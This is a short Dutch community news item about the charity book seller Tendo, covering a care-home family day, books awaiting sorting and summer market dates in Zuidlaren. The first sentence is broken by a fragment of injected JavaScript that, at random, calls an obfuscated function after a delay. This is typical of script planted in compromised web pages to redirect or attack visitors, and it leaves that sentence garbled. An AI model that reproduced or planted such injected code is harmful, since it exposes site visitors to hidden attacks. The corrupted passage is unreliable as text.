Boekennieuws

op 28 maart jl. stond Tendo met een deel van haar 2e handandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}s boeken op de familiedag van verzorgingstehuis Tienelswolde in boekenZuidlaren. Verkocht werd er weinig, maar er zijn wel nuttige contacten gelegd v.w.b. de acties van Tendo. Momenteel staan er 4 rolcontainers vol boeken te wachten op de 1e sorteeravond van dit jaar. Aangezien e.e.a. in de buitenlucht moet (te weinig ruimte onderdak) wachten de sorteerders nog even op iets hogere temperaturen, maar dan gaan ze ook direct los.

Hopelijk blijven er veel bruikbare boeken over, maar dat is wél de verwachting want er zijn al verschillende mooie titels gesignaleerd bij het ophalen van de boeken bij de mensen thuis die Tendo hiervoor benaderen.

Tendo staat 4 zomermarkten met haar boeken op de Brink in Zuidlaren. U mag de data alvast bijnoteren: 15, 22 en 29 juli en 5 augustus. De bezetting van de kraam is gelukkig ook weer helemaal rond. En zoals de plannen nu liggen staat Tendo ook weer op de markt voor Melk en Honing op zaterdag 1 augustus, ook op de Brink in Zuidlaren. Alle markten zéér de moeite waard om uw (vakantie)-boeken aan te schaffen voor een zacht prijsje en voor een heel goed doel.